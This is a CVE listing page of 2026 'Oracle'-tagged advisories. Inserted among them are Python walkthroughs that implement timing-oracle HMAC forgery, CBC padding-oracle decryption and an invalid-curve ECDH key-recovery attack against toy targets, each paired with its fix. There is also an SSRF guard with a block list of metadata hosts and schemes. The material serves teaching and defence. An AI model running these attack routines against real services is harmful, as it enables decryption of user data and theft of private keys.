Oracle

261 CVEs

CVE-2026-5504 MEDIUM This Month

Padding oracle vulnerability in wolfSSL's PKCS7 CBC decryption allows unauthenticated remote attackers to recover plaintext through repeated decryption queries with modified ciphertext, exploiting insufficient validation of interior padding bytes. The vulnerability requires high attack complexity and persistent attacker interaction but presents practical risk to systems using affected wolfSSL versions for PKCS7-encrypted communications.

Information Disclosure Oracle
NVD GitHub VulDB
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-29146 HIGH PATCH GHSA This Week

Padding oracle attack in Apache Tomcat EncryptInterceptor leaks encrypted session data confidentiality across versions 7.0.100-7.0.109, 8.5.38-8.5.100, 9.0.13-9.0.115, 10.0.0-M1-10.1.52, and 11.0.0-M1-11.0.18 when default configuration is deployed. Unauthenticated remote attackers exploit oracle responses to decrypt sensitive information without authentication (CVSS:3.1 AV:N/AC:L/PR:N). CWE-209 (information exposure through error messages) enables cryptographic side-channel extraction. No public exploit identified at time of analysis; low observed exploitation activity (EPSS 0.02%).

Apache Oracle Information Disclosure Tomcat Apache Tomcat
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-39974 HIGH PATCH GHSA This Week

Server-Side Request Forgery in n8n-mcp (npm package) versions ≤2.47.3 allows authenticated attackers with valid AUTH_TOKEN to force the server to issue HTTP requests to arbitrary URLs via manipulated multi-tenant HTTP headers (x-n8n-url, x-n8n-key). Response bodies are reflected through JSON-RPC, enabling unauthorized access to cloud instance metadata endpoints (AWS IMDS, GCP, Azure, Oracle, Alibaba), internal network services, and any host reachable by the server process. Multi-tenant HTTP deployments with shared or multiple AUTH_TOKENs are at highest risk. No public exploit identified at time of analysis.

SSRF Oracle Microsoft
NVD GitHub
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-33439 CRITICAL PATCH GHSA Act Now

Remote code execution in OpenIdentityPlatform OpenAM 16.0.5 and earlier allows unauthenticated attackers to execute arbitrary OS commands via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypass exploits an unpatched deserialization sink in JATO's ClientSession.deserializeAttributes() that was overlooked when CVE-2021-35464 was mitigated. Attackers can target any JATO ViewBean endpoint with <jato:form> tags (commonly found in password reset pages) using a PriorityQueue→TemplatesImpl gadget chain with libraries bundled in OpenAM's WAR file. Vendor-released patch available in version 16.0.6 (GitHub commit 014007c). No public exploit code identified at time of analysis, but detailed technical writeup with gadget chain specifics has been published.

Deserialization RCE Java Apache Tomcat +3
NVD GitHub
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-35187 HIGH GHSA This Week

Server-Side Request Forgery in pyLoad-ng allows authenticated users with ADD permissions to read local files via file:// protocol, access internal network services, and exfiltrate cloud metadata. The parse_urls API endpoint fetches arbitrary URLs without protocol validation, enabling attackers to read /etc/passwd, configuration files, SQLite databases, and AWS/GCP metadata endpoints at 169.254.169.254. Error-based responses create a file existence oracle. Multi-protocol support (file://, gopher://, dict://) escalates impact beyond standard HTTP SSRF. CVSS 7.7 reflects network attack vector, low complexity, and scope change with high confidentiality impact. No public exploit code identified at time of analysis, though detailed proof-of-concept included in advisory demonstrates exploitation via curl commands against Docker deployments.

SSRF Docker Redis Python CSRF +1
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-34595 MEDIUM PATCH GHSA This Month

Parse Server versions prior to 8.6.70 and 9.7.0-alpha.18 allow authenticated users with find class-level permissions to bypass protectedFields restrictions on LiveQuery subscriptions by submitting array-like objects with numeric keys instead of proper arrays in $or, $and, or $nor operators. This enables information disclosure through a binary oracle attack that reveals whether protected fields match attacker-supplied values. The vulnerability requires prior authentication and find-level access but no user interaction, affecting all deployments of vulnerable Parse Server versions.

Node.js Authentication Bypass Memory Corruption Oracle
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-21713 MEDIUM PATCH This Month

Node.js versions 20.x, 22.x, 24.x, and 25.x use non-constant-time comparison for HMAC signature verification, allowing remote attackers to infer valid HMAC values through timing oracle attacks. The vulnerability leaks information proportional to matching bytes and requires high-resolution timing measurement capability, making exploitation feasible in controlled network conditions. CVSS 5.9 (confidentiality impact only); no public exploit identified at time of analysis.

Node.js Information Disclosure Oracle Redhat
NVD
CVSS 3.0
5.9
EPSS
0.0%
CVE-2026-27856 HIGH PATCH This Week

OX Dovecot Pro's doveadm HTTP service is vulnerable to timing oracle attacks during credential verification, allowing remote unauthenticated attackers to enumerate valid credentials through timing analysis and gain full administrative access to the doveadm management interface. The vulnerability affects OX Dovecot Pro installations with exposed doveadm HTTP service ports, carries a CVSS score of 7.4, and has no public exploit identified at time of analysis.

Oracle Authentication Bypass Redhat
NVD VulDB
CVSS 3.1
7.4
EPSS
0.0%
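The Node.js HMAC entry (CVE-2026-21713) and the doveadm entry (CVE-2026-27856) above describe the same primitive: a comparison whose running time grows with the number of leading bytes that match. The following is an added worked example, not code from Node.js, Dovecot or any other project on this page. It models the leak as an observable "cost" (bytes examined, standing in for response time), shows how an attacker turns that into a byte-at-a-time tag forgery, and contrasts it with the constant-time comparison the fixes use. The server key, message and function names are constructed for the demo.

```python
"""Timing-oracle comparison demo (added example; not Node.js or Dovecot code)."""
import hashlib
import hmac

SERVER_KEY = b"constructed-server-secret"          # constructed for the demo
MESSAGE = b'{"user":"alice","role":"admin"}'        # constructed for the demo
TRUE_TAG = hmac.new(SERVER_KEY, MESSAGE, hashlib.sha256).digest()


def leaky_equals(a: bytes, b: bytes):
    """Early-exit comparison. Returns (equal, bytes_examined); the count stands in for time."""
    if len(a) != len(b):
        return False, 0
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return False, i + 1          # stops at the first mismatch: work grows with the matching prefix
    return True, len(a)


def constant_time_equals(a: bytes, b: bytes):
    """Accumulates differences without branching on the data; work is independent of content."""
    if len(a) != len(b):
        return False, 0                  # length is public for a fixed-size MAC, so this branch is fine
    diff = 0
    for x, y in zip(a, b):
        diff |= x ^ y
    return diff == 0, len(a)


def make_oracle(compare):
    """A verifier endpoint: returns (accepted, observable_cost) for a candidate tag."""
    def oracle(candidate: bytes):
        return compare(TRUE_TAG, candidate)
    return oracle


def forge_tag(oracle, length: int = 32) -> bytes:
    """Byte-at-a-time forgery: at each position keep the byte whose cost exceeds pos + 1,
    i.e. the one that made the verifier look one byte further."""
    tag = bytearray(length)
    for pos in range(length):
        for guess in range(256):
            tag[pos] = guess
            accepted, cost = oracle(bytes(tag))
            if accepted or cost > pos + 1:
                break
    return bytes(tag)


def verify_properly(key: bytes, msg: bytes, tag: bytes) -> bool:
    """What the fixed implementations do: recompute, then compare with hmac.compare_digest."""
    return hmac.compare_digest(hmac.new(key, msg, hashlib.sha256).digest(), tag)
```

Against `leaky_equals` the forgery needs at most 256 × 32 queries and recovers the full tag; against `constant_time_equals` every query costs the same, so the loop learns nothing and the result is garbage. The real-world attack replaces the exact byte count with many timing samples per guess, which is why the advisories rate exploitation as needing controlled network conditions rather than impossible.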
CVE-2026-33763 MEDIUM PATCH This Month

AVideo's password verification API endpoint allows unauthenticated attackers to brute-force video access passwords at network speed with no rate limiting, enabling compromise of password-protected video content across the platform. The vulnerable endpoint in the wwbn/avideo package (pkg:composer/wwbn_avideo) returns a boolean confirmation for any password guess without authentication, CAPTCHA, or throttling, and plaintext password storage combined with a loose-equality comparison further weakens the check. Publicly available exploit code demonstrates rapid password enumeration against any video ID.

PHP Information Disclosure Oracle
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-33429 MEDIUM PATCH This Month

An information disclosure vulnerability in Parse Server's LiveQuery functionality allows attackers to infer the values of protected fields by monitoring whether update events are generated when those fields change, effectively creating a binary oracle that reveals field modifications despite the field values themselves being stripped from event payloads. The vulnerability affects Parse Server npm package across multiple versions, and while no public exploit code or active exploitation has been documented, the attack requires only standard subscription capabilities without elevated privileges. The vendor has released patches that validate the watch parameter against protected fields at subscription time, mirroring existing where clause protections.

Information Disclosure Oracle
NVD GitHub VulDB
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-32935 MEDIUM PATCH This Month

phpseclib versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a padding oracle timing attack when using AES in CBC mode, allowing attackers to decrypt sensitive data by analysing response-timing differences on attacker-modified ciphertext. This information disclosure vulnerability affects any PHP application that uses a vulnerable phpseclib release for AES-CBC decryption. No EPSS data or confirmed active exploitation (KEV status) is currently available, but the presence of a verified fix and security advisory indicates this is a legitimate cryptographic weakness requiring attention.

PHP Oracle Information Disclosure
NVD GitHub VulDB
CVSS 3.1
5.9
EPSS
0.0%
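The wolfSSL PKCS7 (CVE-2026-5504), Tomcat EncryptInterceptor (CVE-2026-29146) and phpseclib (CVE-2026-32935) entries above are all instances of the CBC padding oracle. The following is an added worked example, not code from any of those projects: a toy 16-byte Feistel cipher keyed with SHA-256 stands in for AES (the attack does not depend on the block cipher, only on CBC plus an observable padding check), `leaky_oracle` models a decryptor whose padding verdict leaks, and `sealed_oracle` shows the encrypt-then-MAC fix that closes the channel. The key, MAC key, IV and plaintext are constructed for the demo.

```python
"""CBC padding oracle attack demo (added example; not wolfSSL, Tomcat or phpseclib code)."""
import hashlib
import hmac

BLOCK = 16
KEY = b"constructed-demo-key-0123456789ab"      # constructed; stands in for the victim's key
MAC_KEY = b"constructed-demo-mac-key"           # constructed; used only by the hardened variant
PLAINTEXT = b"attack at dawn; pkcs7 oracle"    # constructed; 28 bytes -> two CBC blocks after padding


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    """8-round Feistel permutation on 16 bytes; any block cipher would do for the attack."""
    l, r = blk[:8], blk[8:]
    for i in range(8):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in reversed(range(8)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    # Every padding byte is checked (wolfSSL's bug was skipping interior bytes), yet the
    # verdict is still a one-bit oracle if the caller can observe it.
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)


def cbc_decrypt_raw(key: bytes, ct: bytes) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))


def leaky_oracle(ct: bytes) -> bool:
    """Vulnerable server: padding validity is observable (distinct error, timing, ...)."""
    try:
        pkcs7_unpad(cbc_decrypt_raw(KEY, ct))
        return True
    except ValueError:
        return False


def sealed_oracle(ct_with_tag: bytes) -> bool:
    """Hardened server: encrypt-then-MAC; padding is only examined after the tag verifies,
    so every forged ciphertext gets the same answer and nothing is learned."""
    ct, tag = ct_with_tag[:-32], ct_with_tag[-32:]
    if not hmac.compare_digest(hmac.new(MAC_KEY, ct, hashlib.sha256).digest(), tag):
        return False
    return leaky_oracle(ct)


def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block from the oracle's yes/no answers alone."""
    inter = bytearray(BLOCK)                  # D_key(target): the pre-XOR intermediate state
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad        # force already-known tail bytes to decrypt to 'pad'
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:              # last byte: rule out an accidental 0x02 0x02 etc.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise ValueError("oracle gave no usable answer")
    return _xor(inter, prev)


def padding_oracle_attack(oracle, ct: bytes) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(recover_block(oracle, p, c) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(pt)


def demo() -> bytes:
    iv = b"\x00" * BLOCK   # fixed IV keeps the demo deterministic; real code uses a random IV
    ct = cbc_encrypt(KEY, iv, pkcs7_pad(PLAINTEXT))
    return padding_oracle_attack(leaky_oracle, ct)


def demo_hardened() -> bool:
    """True if the same attack fails against the encrypt-then-MAC variant (attacker lacks MAC_KEY)."""
    ct = cbc_encrypt(KEY, b"\x00" * BLOCK, pkcs7_pad(PLAINTEXT))
    try:
        padding_oracle_attack(lambda c: sealed_oracle(c + b"\x00" * 32), ct)
    except ValueError:
        return True
    return False
```

The cost is at most 256 oracle queries per plaintext byte, which is why the advisories describe "repeated decryption queries" and "persistent attacker interaction": no key material is touched, only the receiver's willingness to say whether padding was valid. Making the error message uniform is not enough on its own (timing still leaks, as the phpseclib entry shows); authenticating the ciphertext before any decryption, or using an AEAD mode, is.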
CVE-2026-21992 CRITICAL POC NEWS Act Now

A critical authentication bypass vulnerability in Oracle Identity Manager and Oracle Web Services Manager allows remote attackers to completely compromise affected systems without any credentials. The vulnerability resides in the REST WebServices and Web Services Security components, affecting versions 12.2.1.4.0 and 14.1.2.1.0 of both products. With a CVSS score of 9.8 and no authentication required, this represents a severe risk to identity management infrastructure, though at the time of analysis no KEV listing or public POC had been documented in the available sources.

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-33292 HIGH This Week

Unauthenticated attackers can stream any private or paid video through a path traversal vulnerability in a PHP application's HLS streaming endpoint. The flaw is a split-oracle condition: authorization validation and file access apply different parsing logic to the videoDirectory parameter, so a crafted value passes the authorization check while the file-access path resolves to content the requester is not entitled to. No patch is currently available for this high-severity vulnerability.

PHP Path Traversal Oracle Apple
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-21994 CRITICAL Act Now

This is a critical unauthenticated remote code execution vulnerability in Oracle Edge Cloud Infrastructure Designer and Visualisation Toolkit version 0.3.0. An attacker with network access via HTTP can completely take over the affected system without any authentication, privileges, or user interaction required. The CVSS score of 9.8 reflects maximum impact across confidentiality, integrity, and availability. There is no evidence of active exploitation (not in CISA KEV), and no proof-of-concept code has been publicly identified in the available intelligence.

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-4258 HIGH PATCH This Week

A cryptographic vulnerability in the Stanford Javascript Crypto Library (SJCL) allows attackers to recover victims' ECDH private keys because the library does not validate that a received public key lies on the curve. The vulnerability affects all versions of SJCL and enables remote attackers to send specially crafted off-curve public keys and observe the resulting ECDH outputs to extract private key material (an invalid-curve attack). A proof-of-concept exploit is publicly available, though the vulnerability is not currently listed in CISA KEV and has no EPSS score assigned yet.

Information Disclosure Oracle Jwt Attack Debian Sjcl
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
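The SJCL entry above (CVE-2026-4258) is an invalid-curve attack: the ECDH group law never uses the curve constant b, so a responder that skips the on-curve check will happily multiply a point from a different curve y² = x³ + ax + b′ by its private key, and if that point has small order q the result reveals d mod q. The following is an added worked example, not SJCL's code. It uses a constructed toy curve over F_1019 so the whole attack runs in well under a second; `vulnerable_ecdh` stands in for the unvalidated responder and `fixed_ecdh` for the patched behaviour. The curve parameters, the private key and all function names are constructed for the demo.

```python
"""Invalid-curve attack against an ECDH responder with no point-on-curve check (added example)."""

P, A, B = 1019, 2, 3     # constructed toy curve y^2 = x^3 + 2x + 3 over F_1019 (p = 3 mod 4 makes sqrt easy)
D_SECRET = 777           # constructed victim private key; the attack below recovers it without reading it


def ec_add(p, a, p1, p2):
    """Short-Weierstrass group law; None is the point at infinity. b never appears: that is the root cause."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % p == 0:
            return None                                   # P + (-P), including 2-torsion points
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p  # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)


def ec_mul(p, a, k, pt):
    acc = None
    while k:
        if k & 1:
            acc = ec_add(p, a, acc, pt)
        pt = ec_add(p, a, pt, pt)
        k >>= 1
    return acc


def on_curve(p, a, b, pt):
    return pt is None or (pt[1] * pt[1] - pt[0] ** 3 - a * pt[0] - b) % p == 0


def count_points(p, a, b):
    """Group order by exhaustive Legendre-symbol count (fine for a toy prime)."""
    n = 1
    for x in range(p):
        v = (x ** 3 + a * x + b) % p
        n += 1 if v == 0 else 2 if pow(v, (p - 1) // 2, p) == 1 else 0
    return n


def lift_x(p, a, b, x):
    v = (x ** 3 + a * x + b) % p
    if v == 0:
        return (x, 0)
    return (x, pow(v, (p + 1) // 4, p)) if pow(v, (p - 1) // 2, p) == 1 else None


def point_of_order(p, a, b, n, q):
    """A point of prime order q on the curve of order n (q | n): (n/q) * any point, if non-trivial."""
    for x in range(p):
        pt = lift_x(p, a, b, x)
        if pt:
            r = ec_mul(p, a, n // q, pt)
            if r is not None:
                return r
    return None


def prime_factors(n):
    out, f = [], 2
    while f * f <= n:
        if n % f == 0:
            out.append(f)
            while n % f == 0:
                n //= f
        f += 1
    return out + ([n] if n > 1 else [])


def crt(residues):
    x, m = 0, 1
    for q, r in residues.items():
        x += m * ((r - x) * pow(m, -1, q) % q)
        m *= q
    return x % m


def vulnerable_ecdh(peer_pub):
    """SJCL-style responder: multiplies whatever point it is handed by the private key."""
    return ec_mul(P, A, D_SECRET, peer_pub)


def fixed_ecdh(peer_pub):
    if peer_pub is None or not on_curve(P, A, B, peer_pub):
        raise ValueError("public key not on curve")
    return ec_mul(P, A, D_SECRET, peer_pub)


def invalid_curve_attack(ecdh, p, a, n_curve, max_q=200):
    """Collect d mod q from curves with the same a but different b, then combine with CRT."""
    residues, m = {}, 1
    for b2 in range(1, p):
        if m >= n_curve:
            break                                         # enough residues to pin down d < n_curve
        if (4 * a ** 3 + 27 * b2 * b2) % p == 0:
            continue                                      # singular curve, skip
        n2 = count_points(p, a, b2)
        for q in prime_factors(n2):
            if q in residues or q > max_q:
                continue
            bad = point_of_order(p, a, b2, n2, q)
            if bad is None:
                continue
            shared = ecdh(bad)                            # victim never checks on_curve(bad)
            residues[q] = next(k for k in range(q) if ec_mul(p, a, k, bad) == shared)
            m *= q
    return crt(residues)


def demo():
    n_curve = count_points(P, A, B)
    return {"d": D_SECRET, "order": n_curve,
            "recovered": invalid_curve_attack(vulnerable_ecdh, P, A, n_curve)}
```

On a real 256-bit curve the arithmetic is identical; the attacker precomputes a handful of curves with the same a whose orders have small factors, and the number of ECDH exchanges needed is the number of residues required for the CRT product to exceed the group order. The one-line fix is the check in `fixed_ecdh`: reject any peer point that does not satisfy the curve equation (and, for curves with cofactor, any point in a small subgroup) before touching the private key.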
CVE-2026-28490 MEDIUM POC PATCH This Month

Authlib's implementation of the JWE RSA1_5 key management algorithm contains a padding oracle vulnerability that leaks decryption failures through timing and exception patterns, allowing attackers to decrypt sensitive data without the private key. The library disabled the constant-time protections provided by the underlying cryptography library and raises exceptions before tag validation completes, creating a reliable side-channel. Public exploit code exists for this vulnerability, which affects Python applications that use Authlib for JWE decryption with RSA1_5.

Oracle Python RCE Redhat Suse
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-32111 MEDIUM PATCH This Month

The ha-mcp OAuth consent form (beta feature) accepts a user-supplied `ha_url` and makes a server-side HTTP request to `{ha_url}/api/config` with no URL validation. An unauthenticated attacker can submit arbitrary URLs to perform internal network reconnaissance via an error oracle. Two additional code paths in OAuth tool calls (REST and WebSocket) are affected by the same primitive. The primary deployment method (private URL with pre-configured `HOMEASSISTANT_TOKEN`) is not affected.

**Code path 1 - Consent form validation** (reported)

When a user submits the OAuth consent form, `_validate_ha_credentials()` (`provider.py`) makes a server-side GET request to `{ha_url}/api/config` with no scheme, IP, or domain validation. Different exception types produce distinct error messages, creating an error oracle:

| Outcome | Message returned | Information leaked |
|---------|------------------|--------------------|
| `ConnectError` | "Could not connect..." | Host down or port closed |
| `TimeoutException` | "Connection timed out..." | Host up, port filtered |
| HTTP 401 | "Invalid access token..." | Service alive, requires auth |
| HTTP 403 | "Access forbidden..." | Service alive, forbidden |
| HTTP ≥ 400 | "Failed to connect: HTTP {N}" | Service alive, exact status |

An attacker can drive the flow programmatically: register a client via open DCR (`POST /register`), initiate authorization, extract a `txn_id`, and submit arbitrary `ha_url` values. No user interaction required.

**Code path 2 - REST tool calls with forged token**

OAuth access tokens are stateless base64-encoded JSON payloads (`{"ha_url": "...", "ha_token": "..."}`). Since tokens are not signed, an attacker can forge a token with an arbitrary `ha_url`. REST tool calls then make HTTP requests to hardcoded HA API paths on that host (`/config`, `/states`, `/services`, etc.). JSON responses are returned to the caller. In practice, path control is limited: most endpoints use absolute paths that ignore the `ha_url` path component. Useful exfiltration requires the target to return JSON at HA API paths, which is unlikely for non-HA services.

**Code path 3 - WebSocket tool calls with forged token**

The same forged token triggers WebSocket connections to `ws://{ha_url}/api/websocket`. The client follows the HA WebSocket handshake protocol (waits for `auth_required`, sends `auth`, expects `auth_ok`). Non-HA targets fail at the protocol level and return nothing useful. Realistic exploitation is limited to pivoting to another HA instance on the internal network.

**Confirmed:** Internal network reconnaissance via error oracle (all 3 code paths). An attacker can map reachable hosts and open ports from the server's network position.

OAuth mode is a **beta** feature, documented separately in `docs/OAUTH.md` and not part of the main setup instructions. The standard deployment method (pre-configured `HOMEASSISTANT_URL` and `HOMEASSISTANT_TOKEN`) is not affected. Upgrade to 7.0.0.

Oracle SSRF Home Assistant Mcp Server
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
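The n8n-mcp (CVE-2026-39974), pyLoad-ng (CVE-2026-35187) and ha-mcp (CVE-2026-32111) entries above are all server-side fetches of a user-controlled URL, and between them they list the usual targets: non-HTTP schemes such as file://, gopher:// and dict://, cloud metadata at 169.254.169.254, loopback and RFC 1918 hosts, and an error message that differs per failure. The following is an added worked example, not code from any of those projects: a guard that vets an outbound URL before the fetch, plus a uniform error result that removes the ha-mcp style error oracle. It assumes the application only ever needs http(s); the resolver is injectable so the check can be tested offline, and the host table in the test is constructed.

```python
"""Outbound-URL guard for user-controlled fetch targets (added example; not n8n-mcp, pyLoad or ha-mcp code)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}                       # rejects file://, gopher://, dict://, ftp://, ...
BLOCKED_NAMES = {"localhost", "metadata", "metadata.google.internal", "instance-data"}  # name-based aliases
GENERIC_ERROR = "Could not validate the supplied URL"     # one message for every failure: no error oracle


class UnsafeURL(ValueError):
    pass


def resolve_with_dns(host: str):
    """Default resolver: every A/AAAA record, not just the first (assumption: stdlib getaddrinfo)."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def _is_blocked(addr) -> bool:
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped                           # ::ffff:169.254.169.254 is still 169.254.169.254
    # is_global is False for loopback, link-local (incl. 169.254.169.254), RFC 1918, ULA, CGNAT, unspecified
    return (not addr.is_global) or addr.is_multicast


def check_outbound_url(url: str, resolver=resolve_with_dns):
    """Return the vetted addresses for `url` or raise UnsafeURL.

    Callers should connect to one of the returned addresses rather than re-resolving the
    hostname, otherwise a DNS rebinding answer can swap the target after the check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {parts.scheme!r} not allowed")
    if not parts.hostname:
        raise UnsafeURL("missing host")
    if parts.username or parts.password:
        raise UnsafeURL("credentials in URL")
    host = parts.hostname.lower().rstrip(".")
    if host in BLOCKED_NAMES:
        raise UnsafeURL(f"host {host!r} not allowed")
    try:
        addrs = [ipaddress.ip_address(host)]              # literal IP (IPv4, IPv6, mapped)
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError, KeyError) as exc:
            raise UnsafeURL(f"cannot resolve {host!r}") from exc
    if not addrs:
        raise UnsafeURL(f"no addresses for {host!r}")
    for addr in addrs:                                    # every address must pass, not just the first
        if _is_blocked(addr):
            raise UnsafeURL(f"{host!r} resolves to blocked address {addr}")
    return addrs


def safe_probe_result(url: str, resolver=resolve_with_dns) -> str:
    """How a consent form or URL-validation endpoint should answer: identical text for every
    failure, with the specific reason going to the server log, never to the requester."""
    try:
        check_outbound_url(url, resolver)
        return "ok"
    except UnsafeURL:
        return GENERIC_ERROR
```

Two things the guard deliberately does not do: it does not try to allowlist paths (the n8n-mcp entry shows header-controlled hosts matter more than paths), and it does not follow redirects; the fetching code must re-run `check_outbound_url` on every redirect target, since a 302 to http://169.254.169.254/ is the standard bypass of a check applied only to the initial URL.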
CVE-2026-21990 HIGH This Week

Oracle VM VirtualBox versions up to 7.1.14 contain a vulnerability that can result in takeover of Oracle VM VirtualBox (CVSS 8.2).

Oracle Virtualbox Vm Virtualbox
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-21989 HIGH This Week

Oracle VM VirtualBox versions up to 7.1.14 contain a vulnerability that can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data (CVSS 8.1).

Oracle Virtualbox Denial Of Service Vm Virtualbox
NVD
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-21988 HIGH This Week

Oracle VM VirtualBox versions up to 7.1.14 contain a vulnerability that can result in takeover of Oracle VM VirtualBox (CVSS 8.2).

Oracle Virtualbox Vm Virtualbox
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-21987 HIGH This Week

Oracle VM VirtualBox versions up to 7.1.14 contain a vulnerability that can result in takeover of Oracle VM VirtualBox (CVSS 8.2).

Oracle Virtualbox Vm Virtualbox
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-21986 HIGH This Week

Oracle VM VirtualBox versions up to 7.1.14 contain a vulnerability that can result in an unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox (CVSS 7.1).

Oracle Windows Virtualbox Denial Of Service Vm Virtualbox
NVD
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-21985 MEDIUM This Month

Oracle VM VirtualBox versions up to 7.1.14 contain a vulnerability that can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data (CVSS 6.0).

Oracle Virtualbox Vm Virtualbox Suse
NVD
CVSS 3.1
6.0
EPSS
0.0%
CVE-2026-21984 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox Suse
NVD
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-21983 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox Suse
NVD
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-21982 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-21981 MEDIUM This Month

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 4.6 MEDIUM]

Oracle Virtualbox Denial Of Service Vm Virtualbox
NVD
CVSS 3.1
4.6
EPSS
0.0%
CVE-2026-21980 MEDIUM This Month

Oracle Life Sciences Central Coding versions up to 7.0.1.0 contain a vulnerability that can result in unauthorized update, insert or delete access to some of Oracle Life Sciences Central Coding accessible data (CVSS 6.5).

Oracle Life Sciences Central Coding
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21979 MEDIUM This Month

Unauthorized data access in Oracle Planning and Budgeting Cloud Service (version 25.04.07) can be achieved by high-privileged attackers with local infrastructure access through the EPM Agent component. The vulnerability requires user interaction from a non-attacker and allows complete compromise of accessible Planning and Budgeting data. No patch is currently available.

Oracle
NVD
CVSS 3.1
4.2
EPSS
0.0%
CVE-2026-21978 MEDIUM This Month

Oracle FLEXCUBE Universal Banking contains a vulnerability that can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Universal Banking accessible data (CVSS 6.5).

Oracle Flexcube Universal Banking
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-21977 LOW Monitor

Vulnerability in the Oracle Zero Data Loss Recovery Appliance Software product of Oracle Zero Data Loss Recovery Appliance (component: Security). Supported versions that are affected are 23.1.0-23.1.202509. [CVSS 3.1 LOW]

Oracle
NVD
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-21976 HIGH This Week

Oracle Business Intelligence versions up to 7.6.0.0.0 contain a vulnerability that can result in unauthorized creation, deletion or modification access to critical data or all Oracle Business Intelligence accessible data (CVSS 7.1).

Oracle Industrial Business Intelligence
NVD
CVSS 3.1
7.1
EPSS
0.0%
